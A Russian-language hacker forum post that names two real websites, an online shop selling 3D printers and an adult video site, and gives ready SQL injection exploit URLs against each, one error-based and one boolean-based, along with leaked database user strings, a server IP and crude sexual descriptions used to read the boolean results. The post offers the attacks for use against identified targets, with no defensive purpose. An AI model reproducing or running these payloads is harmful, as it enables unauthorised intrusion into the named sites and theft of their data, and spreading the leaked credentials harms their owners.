19.05.2017, 19:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
14926
Репутация:
17
|
|
Шоп с 3d принтерами и всяким оборудованием
Сайт: smtmax.com
SQL Injection через GET, уязвимый параметр act
Linux:x86_64:smtmax8_smtmax@localhost:smtmax8_smtmax:5.6.35:/usr
эксплоит:
Код:
Code:
http://www.smtmax.com/info.php?act=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(%40%40version_compile_os%2c0x3a%2c%40%40version_compile_machine%2c0x3a%2cuser()%2c0x3a%2cdatabase()%2c0x3a%2c%40%40version%2c0x3a%2c%40%40basedir%2c0x3a%2cFLOOR(RAND(0)*2))a+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+a)b)%2b%27
Сайт адалт тематики: straightpornstuds.com
Примерные данные за день
Посетителей: 1469
Просмотров: 5878
Boolean Based SQL Injection
5.0.96 log:str5lt3m 2@107.180.121.24:str5lt3m1 2
Если появился видео ролик от BRAZERS с брюнеткой в очках с толстой жопой и силиконовыми буферами значит "true"
Если перекинуло на ролик от DDFnetwork где бландинку долбят в рот в четыре ствола это "false"
эксплоит:
Код:
Code:
http://straightpornstuds.com/80341%20OR%20(select%20ascii(substr(database(),1,1))=115).html
P.s. когда true страничка может долго подгружаться. |
|
|
|